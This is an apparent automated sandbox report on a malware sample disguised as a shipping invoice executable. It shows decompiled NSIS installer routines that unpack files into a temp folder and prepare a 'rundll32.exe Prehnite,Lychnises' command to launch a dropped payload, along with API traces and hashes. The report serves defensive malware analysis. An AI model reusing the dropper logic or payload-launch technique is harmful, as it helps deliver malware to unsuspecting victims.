                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000400,?,0042A078,00000000,004052C5,0042A078,00000000), ref: 004062C6
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(004052C5,00000000,?,0042A078,00000000,004052C5,0042A078,00000000), ref: 00406302
                                                                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 00406310
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040631C
                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,\Microsoft\Internet Explorer\Quick Launch), ref: 00406340
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,0042A078,00000000,004052C5,0042A078,00000000,00000000,00000000,00000000), ref: 00406392
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 717251189-1054654634
                                                                                                                                    • Opcode ID: eaa5d213a5baab0d35b31186351ceecca8addbf06f170eed641c8924b89c10a3
                                                                                                                                    • Instruction ID: be79e8900952b0bcd71d12beb6e151bfd298952ab6d62edeb4306d0cd8c50f96
                                                                                                                                    • Opcode Fuzzy Hash: eaa5d213a5baab0d35b31186351ceecca8addbf06f170eed641c8924b89c10a3
                                                                                                                                    • Instruction Fuzzy Hash: 1D611131900101AFDF206F64C984BBE7BB4AB55314F52413FE943BA2D1C67C4962DB8E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                                                                    				void* _t33;
                                                                                                                                    				void* _t41;
                                                                                                                                    				void* _t43;
                                                                                                                                    				FILETIME* _t49;
                                                                                                                                    				FILETIME* _t62;
                                                                                                                                    				void* _t64;
                                                                                                                                    				signed int _t70;
                                                                                                                                    				FILETIME* _t71;
                                                                                                                                    				FILETIME* _t75;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				void* _t80;
                                                                                                                                    				CHAR* _t82;
                                                                                                                                    				CHAR* _t83;
                                                                                                                                    				void* _t85;
                                                                                                                                    
                                                                                                                                    				_t75 = __ebx;
                                                                                                                                    				_t82 = E00402B2C(0x31);
                                                                                                                                    				 *(_t85 - 8) = _t82;
                                                                                                                                    				 *(_t85 + 8) =  *(_t85 - 0x34) & 0x00000007;
                                                                                                                                    				_t33 = E00405B6B(_t82);
                                                                                                                                    				_push(_t82);
                                                                                                                                    				_t83 = "rundll32.exe Prehnite,Lychnises";
                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                    					lstrcatA(E00405AFE(E00406166(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                                                                                    				} else {
                                                                                                                                    					E00406166();
                                                                                                                                    				}
                                                                                                                                    				E004063D0(_t83);
                                                                                                                                    				while(1) {
                                                                                                                                    					__eflags =  *(_t85 + 8) - 3;
                                                                                                                                    					if( *(_t85 + 8) >= 3) {
                                                                                                                                    						_t64 = E00406469(_t83);
                                                                                                                                    						_t77 = 0;
                                                                                                                                    						__eflags = _t64 - _t75;
                                                                                                                                    						if(_t64 != _t75) {
                                                                                                                                    							_t71 = _t64 + 0x14;
                                                                                                                                    							__eflags = _t71;
                                                                                                                                    							_t77 = CompareFileTime(_t71, _t85 - 0x28);
                                                                                                                                    						}
                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                                    						__eflags = _t70;
                                                                                                                                    						 *(_t85 + 8) = _t70;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                    					if( *(_t85 + 8) == _t75) {
                                                                                                                                    						E00405CDA(_t83);
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *(_t85 + 8) - 1;
                                                                                                                                    					_t41 = E00405CFF(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                                    					__eflags = _t41 - 0xffffffff;
                                                                                                                                    					 *(_t85 - 0xc) = _t41;
                                                                                                                                    					if(_t41 != 0xffffffff) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                    					if( *(_t85 + 8) != _t75) {
                                                                                                                                    						E0040528D(0xffffffe2,  *(_t85 - 8));
                                                                                                                                    						__eflags =  *(_t85 + 8) - 2;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                                    						}
                                                                                                                                    						L31:
                                                                                                                                    						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                                    						__eflags =  *0x42f4c8;
                                                                                                                                    						goto L32;
                                                                                                                                    					} else {
                                                                                                                                    						E00406166(0x40ac30, 0x430000);
                                                                                                                                    						E00406166(0x430000, _t83);
                                                                                                                                    						E00406188(_t75, 0x40ac30, _t83, "C:\Users\jones\AppData\Local\Temp\include\net-knjiela\agent",  *((intOrPtr*)(_t85 - 0x20)));
                                                                                                                                    						E00406166(0x430000, 0x40ac30);
                                                                                                                                    						_t62 = E00405882("C:\Users\jones\AppData\Local\Temp\include\net-knjiela\agent",  *(_t85 - 0x34) >> 3) - 4;
                                                                                                                                    						__eflags = _t62;
                                                                                                                                    						if(_t62 == 0) {
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t62 == 1;
                                                                                                                                    							if(_t62 == 1) {
                                                                                                                                    								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                                                                                                    								L32:
                                                                                                                                    								_t49 = 0;
                                                                                                                                    								__eflags = 0;
                                                                                                                                    							} else {
                                                                                                                                    								_push(_t83);
                                                                                                                                    								_push(0xfffffffa);
                                                                                                                                    								E0040528D();
                                                                                                                                    								L29:
                                                                                                                                    								_t49 = 0x7fffffff;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L33:
                                                                                                                                    					return _t49;
                                                                                                                                    				}
                                                                                                                                    				E0040528D(0xffffffea,  *(_t85 - 8));
                                                                                                                                    				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                                                                                                    				_t43 = E004030DA(_t77,  *((intOrPtr*)(_t85 - 0x2c)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                                                                    				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                                                                                                    				__eflags =  *(_t85 - 0x28) - 0xffffffff;
                                                                                                                                    				_t80 = _t43;
                                                                                                                                    				if( *(_t85 - 0x28) != 0xffffffff) {
                                                                                                                                    					L22:
                                                                                                                                    					SetFileTime( *(_t85 - 0xc), _t85 - 0x28, _t75, _t85 - 0x28); // executed
                                                                                                                                    				} else {
                                                                                                                                    					__eflags =  *((intOrPtr*)(_t85 - 0x24)) - 0xffffffff;
                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0x24)) != 0xffffffff) {
                                                                                                                                    						goto L22;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                                                                    				__eflags = _t80 - _t75;
                                                                                                                                    				if(_t80 >= _t75) {
                                                                                                                                    					goto L31;
                                                                                                                                    				} else {
                                                                                                                                    					__eflags = _t80 - 0xfffffffe;
                                                                                                                                    					if(_t80 != 0xfffffffe) {
                                                                                                                                    						E00406188(_t75, _t80, _t83, _t83, 0xffffffee);
                                                                                                                                    					} else {
                                                                                                                                    						E00406188(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                                                                                                    						lstrcatA(_t83,  *(_t85 - 8));
                                                                                                                                    					}
                                                                                                                                    					_push(0x200010);
                                                                                                                                    					_push(_t83);
                                                                                                                                    					E00405882();
                                                                                                                                    					goto L29;
                                                                                                                                    				}
                                                                                                                                    				goto L33;
                                                                                                                                    			}


















                                                                                                                                    APIs
                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,rundll32.exe Prehnite,Lychnises,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,rundll32.exe Prehnite,Lychnises,rundll32.exe Prehnite,Lychnises,00000000,00000000,rundll32.exe Prehnite,Lychnises,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                      • Part of subcall function 00406166: lstrcpynA.KERNEL32(?,?,00000400,0040347B,Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00406173
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$rundll32.exe Prehnite,Lychnises
                                                                                                                                    • API String ID: 1941528284-3385065982
                                                                                                                                    • Opcode ID: 95783ee652e82e45a183bb9a5dadce108a0dfd522e0a6921b6cbffd4d3137759
                                                                                                                                    • Instruction ID: 0d24fbf38afd7fb560e0b59b59096af1ff73f14f9e2588428075e9193dc755de
                                                                                                                                    • Opcode Fuzzy Hash: 95783ee652e82e45a183bb9a5dadce108a0dfd522e0a6921b6cbffd4d3137759
                                                                                                                                    • Instruction Fuzzy Hash: 7941B432900514BACB107BB5CD45DAF3679EF05369F20833BF416F60E2D67C8A519A6E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406490(intOrPtr _a4) {
                                                                                                                                    				char _v292;
                                                                                                                                    				int _t10;
                                                                                                                                    				struct HINSTANCE__* _t14;
                                                                                                                                    				void* _t16;
                                                                                                                                    				void* _t21;
                                                                                                                                    
                                                                                                                                    				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                                    				if(_t10 > 0x104) {
                                                                                                                                    					_t10 = 0;
                                                                                                                                    				}
                                                                                                                                    				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                                    					_t16 = 1;
                                                                                                                                    				} else {
                                                                                                                                    					_t16 = 0;
                                                                                                                                    				}
                                                                                                                                    				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                                                                    				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                                    				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                                    				return _t14;
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A7
                                                                                                                                    • wsprintfA.USER32 ref: 004064E0
                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                    • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                    • Instruction ID: 5c9ba02e0f5ecaabbb2a6fa43fbb70e0047563966992d60890c655317a48286c
                                                                                                                                    • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                    • Instruction Fuzzy Hash: 5EF0F63051060A6BDB559B64DD0DFEB365CAB08304F14057AA68AE11C1EA78D8398B5C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E004031E2(intOrPtr _a4) {
                                                                                                                                    				intOrPtr _t10;
                                                                                                                                    				intOrPtr _t11;
                                                                                                                                    				signed int _t12;
                                                                                                                                    				void* _t15;
                                                                                                                                    				long _t16;
                                                                                                                                    				void* _t18;
                                                                                                                                    				intOrPtr _t19;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				long _t31;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    				intOrPtr _t35;
                                                                                                                                    				void* _t36;
                                                                                                                                    				intOrPtr _t48;
                                                                                                                                    
                                                                                                                                    				_t31 =  *0x429444; // 0xa0970
                                                                                                                                    				_t33 = _t31 -  *0x40b878 + _a4;
                                                                                                                                    				 *0x42f430 = GetTickCount() + 0x1f4;
                                                                                                                                    				if(_t33 <= 0) {
                                                                                                                                    					L22:
                                                                                                                                    					E00402D75(1);
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				E00403361( *0x429454);
                                                                                                                                    				SetFilePointer( *0x40a01c,  *0x40b878, 0, 0); // executed
                                                                                                                                    				 *0x429450 = _t33;
                                                                                                                                    				 *0x429440 = 0;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t10 =  *0x429448; // 0x6af57
                                                                                                                                    					_t30 = 0x4000;
                                                                                                                                    					_t11 = _t10 -  *0x429454;
                                                                                                                                    					if(_t11 <= 0x4000) {
                                                                                                                                    						_t30 = _t11;
                                                                                                                                    					}
                                                                                                                                    					_t12 = E0040334B(0x41d440, _t30);
                                                                                                                                    					if(_t12 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *0x429454 =  *0x429454 + _t30;
                                                                                                                                    					 *0x40b880 = 0x41d440;
                                                                                                                                    					 *0x40b884 = _t30;
                                                                                                                                    					L6:
                                                                                                                                    					if( *0x42f434 != 0 &&  *0x42f4e0 == 0) {
                                                                                                                                    						_t19 =  *0x429450; // 0xf65d
                                                                                                                                    						 *0x429440 = _t19 -  *0x429444 - _a4 +  *0x40b878;
                                                                                                                                    						E00402D75(0);
                                                                                                                                    					}
                                                                                                                                    					 *0x40b888 = 0x415440;
                                                                                                                                    					 *0x40b88c = 0x8000;
                                                                                                                                    					if(E00406623(0x40b880) < 0) {
                                                                                                                                    						goto L20;
                                                                                                                                    					}
                                                                                                                                    					_t35 =  *0x40b888; // 0x4165b0
                                                                                                                                    					_t36 = _t35 - 0x415440;
                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                    						__eflags =  *0x40b884; // 0x0
                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                    							goto L20;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t30;
                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                    							goto L20;
                                                                                                                                    						}
                                                                                                                                    						L16:
                                                                                                                                    						_t16 =  *0x429444; // 0xa0970
                                                                                                                                    						if(_t16 -  *0x40b878 + _a4 > 0) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                                    						goto L22;
                                                                                                                                    					}
                                                                                                                                    					_t18 = E00405DA6( *0x40a01c, 0x415440, _t36); // executed
                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                    						_push(0xfffffffe);
                                                                                                                                    						L21:
                                                                                                                                    						_pop(_t15);
                                                                                                                                    						return _t15;
                                                                                                                                    					}
                                                                                                                                    					 *0x40b878 =  *0x40b878 + _t36;
                                                                                                                                    					_t48 =  *0x40b884; // 0x0
                                                                                                                                    					if(_t48 != 0) {
                                                                                                                                    						goto L6;
                                                                                                                                    					}
                                                                                                                                    					goto L16;
                                                                                                                                    					L20:
                                                                                                                                    					_push(0xfffffffd);
                                                                                                                                    					goto L21;
                                                                                                                                    				}
                                                                                                                                    				return _t12 | 0xffffffff;
                                                                                                                                    			}
















                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004032fe
                                                                                                                                    0x00403300
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403302
                                                                                                                                    0x00403302
                                                                                                                                    0x00403315
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403324
                                                                                                                                    0x00000000
                                                                                                                                    0x00403324
                                                                                                                                    0x004032dd
                                                                                                                                    0x004032e4
                                                                                                                                    0x00403331
                                                                                                                                    0x00403337
                                                                                                                                    0x00403337
                                                                                                                                    0x00000000
                                                                                                                                    0x00403337
                                                                                                                                    0x004032e6
                                                                                                                                    0x004032ec
                                                                                                                                    0x004032f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403335
                                                                                                                                    0x00403335
                                                                                                                                    0x00000000
                                                                                                                                    0x00403335
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004031F6
                                                                                                                                      • Part of subcall function 00403361: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403061,?), ref: 0040336F
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040310C,00000004,00000000,00000000,?,?,00403088,000000FF,00000000,00000000,0040A130,?), ref: 00403229
                                                                                                                                    • SetFilePointer.KERNELBASE(000A0970,00000000,00000000,0040B880,0041D440,00004000,?,00000000,0040310C,00000004,00000000,00000000,?,?,00403088,000000FF), ref: 00403324
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                                    • String ID: @TA$p
                                                                                                                                    • API String ID: 1092082344-1633522545
                                                                                                                                    • Opcode ID: 65e295836797f465d6f87047955051ebaaea20ed010ffd132a0a9e5062fbf2e5
                                                                                                                                    • Instruction ID: 7d9149e57ab4ca5e2efc3b6109a7dda39540d8cae81da205c7fa460a022e7ea3
                                                                                                                                    • Opcode Fuzzy Hash: 65e295836797f465d6f87047955051ebaaea20ed010ffd132a0a9e5062fbf2e5
                                                                                                                                    • Instruction Fuzzy Hash: BD319372604201DBD720AF66EE849163BACF75039E794413FEC40B22F0CB38AD429B5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405D2E(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                    				char _t11;
                                                                                                                                    				signed int _t12;
                                                                                                                                    				int _t15;
                                                                                                                                    				signed int _t17;
                                                                                                                                    				void* _t20;
                                                                                                                                    				CHAR* _t21;
                                                                                                                                    
                                                                                                                                    				_t21 = _a4;
                                                                                                                                    				_t20 = 0x64;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t11 =  *0x40a3cc; // 0x61736e
                                                                                                                                    					_t20 = _t20 - 1;
                                                                                                                                    					_a4 = _t11;
                                                                                                                                    					_t12 = GetTickCount();
                                                                                                                                    					_t17 = 0x1a;
                                                                                                                                    					_a6 = _a6 + _t12 % _t17;
                                                                                                                                    					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                                    					if(_t15 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                                    					return _t15;
                                                                                                                                    				}
                                                                                                                                    				return _t21;
                                                                                                                                    			}










                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405D42
                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D5C
                                                                                                                                    Strings
                                                                                                                                    • nsa, xrefs: 00405D39
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D31
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 00405D2E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-1564492482
                                                                                                                                    • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                    • Instruction ID: de9a854a4fa859a30a4a9b59d99d9da2062d6b2b4d40687377e9b0ef136d8f1b
                                                                                                                                    • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                                                                                                    • Instruction Fuzzy Hash: 9BF0E2363046086BDB108F55EC08B9B7B98DF91710F04C03BFA489A180D6B498248798
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E004030DA(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                    				long _v8;
                                                                                                                                    				long _t21;
                                                                                                                                    				long _t22;
                                                                                                                                    				void* _t24;
                                                                                                                                    				long _t26;
                                                                                                                                    				int _t27;
                                                                                                                                    				long _t28;
                                                                                                                                    				void* _t30;
                                                                                                                                    				long _t31;
                                                                                                                                    				long _t32;
                                                                                                                                    				long _t36;
                                                                                                                                    
                                                                                                                                    				_t21 = _a4;
                                                                                                                                    				if(_t21 >= 0) {
                                                                                                                                    					_t32 = _t21 +  *0x42f498;
                                                                                                                                    					 *0x429444 = _t32;
                                                                                                                                    					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                                    				}
                                                                                                                                    				_t22 = E004031E2(4);
                                                                                                                                    				if(_t22 >= 0) {
                                                                                                                                    					_t24 = E00405D77( *0x40a01c,  &_a4, 4); // executed
                                                                                                                                    					if(_t24 == 0) {
                                                                                                                                    						L18:
                                                                                                                                    						_push(0xfffffffd);
                                                                                                                                    						goto L19;
                                                                                                                                    					} else {
                                                                                                                                    						 *0x429444 =  *0x429444 + 4;
                                                                                                                                    						_t36 = E004031E2(_a4);
                                                                                                                                    						if(_t36 < 0) {
                                                                                                                                    							L21:
                                                                                                                                    							_t22 = _t36;
                                                                                                                                    						} else {
                                                                                                                                    							if(_a12 != 0) {
                                                                                                                                    								_t26 = _a4;
                                                                                                                                    								if(_t26 >= _a16) {
                                                                                                                                    									_t26 = _a16;
                                                                                                                                    								}
                                                                                                                                    								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                    									_t36 = _v8;
                                                                                                                                    									 *0x429444 =  *0x429444 + _t36;
                                                                                                                                    									goto L21;
                                                                                                                                    								} else {
                                                                                                                                    									goto L18;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_a4 <= 0) {
                                                                                                                                    									goto L21;
                                                                                                                                    								} else {
                                                                                                                                    									while(1) {
                                                                                                                                    										_t28 = _a4;
                                                                                                                                    										if(_a4 >= 0x4000) {
                                                                                                                                    											_t28 = 0x4000;
                                                                                                                                    										}
                                                                                                                                    										_v8 = _t28;
                                                                                                                                    										if(E00405D77( *0x40a01c, 0x41d440, _t28) == 0) {
                                                                                                                                    											goto L18;
                                                                                                                                    										}
                                                                                                                                    										_t30 = E00405DA6(_a8, 0x41d440, _v8); // executed
                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                    											_push(0xfffffffe);
                                                                                                                                    											L19:
                                                                                                                                    											_pop(_t22);
                                                                                                                                    										} else {
                                                                                                                                    											_t31 = _v8;
                                                                                                                                    											_a4 = _a4 - _t31;
                                                                                                                                    											 *0x429444 =  *0x429444 + _t31;
                                                                                                                                    											_t36 = _t36 + _t31;
                                                                                                                                    											if(_a4 > 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												goto L21;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										goto L22;
                                                                                                                                    									}
                                                                                                                                    									goto L18;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L22:
                                                                                                                                    				return _t22;
                                                                                                                                    			}















                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403088,000000FF,00000000,00000000,0040A130,?), ref: 004030FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID: p
                                                                                                                                    • API String ID: 973152223-2594693909
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E004015BB(char __ebx, void* __eflags) {
                                                                                                                                    				void* _t13;
                                                                                                                                    				int _t19;
                                                                                                                                    				char _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				char _t23;
                                                                                                                                    				signed char _t24;
                                                                                                                                    				char _t26;
                                                                                                                                    				CHAR* _t28;
                                                                                                                                    				char* _t32;
                                                                                                                                    				void* _t33;
                                                                                                                                    
                                                                                                                                    				_t26 = __ebx;
                                                                                                                                    				_t28 = E00402B2C(0xfffffff0);
                                                                                                                                    				_t13 = E00405B97(_t28);
                                                                                                                                    				_t30 = _t13;
                                                                                                                                    				if(_t13 != __ebx) {
                                                                                                                                    					do {
                                                                                                                                    						_t32 = E00405B29(_t30, 0x5c);
